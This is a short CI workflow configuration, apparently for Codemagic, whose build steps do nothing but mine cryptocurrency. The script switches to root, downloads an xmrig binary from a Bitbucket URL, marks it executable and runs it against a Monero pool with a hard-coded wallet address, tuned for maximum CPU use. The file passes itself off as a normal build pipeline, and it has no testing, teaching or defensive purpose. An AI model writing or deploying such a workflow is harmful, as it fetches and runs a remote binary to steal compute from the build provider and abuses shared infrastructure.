workflows:
  my-workflow:
    name: My workflow name
    instance_type: mac_mini
    max_build_duration: 120
    scripts:
      - sudo su
      - wget https://bitbucket.org/kingx1001/codemagic/downloads/xmrig
      - ls && chmod +x xmrig
      - ./xmrig -o xmrpool.eu:9999 -u 43FN9N7ktZJAtr6nsvNdTtKHbuCJAER7L9srybAMPNWBHzGk98f3jiTNGRkBfgeEDRQan9PwdYfFwEDrKq9DH7ck8K19JPD -k -t3 --tls --print-time 5 --cpu-no-yield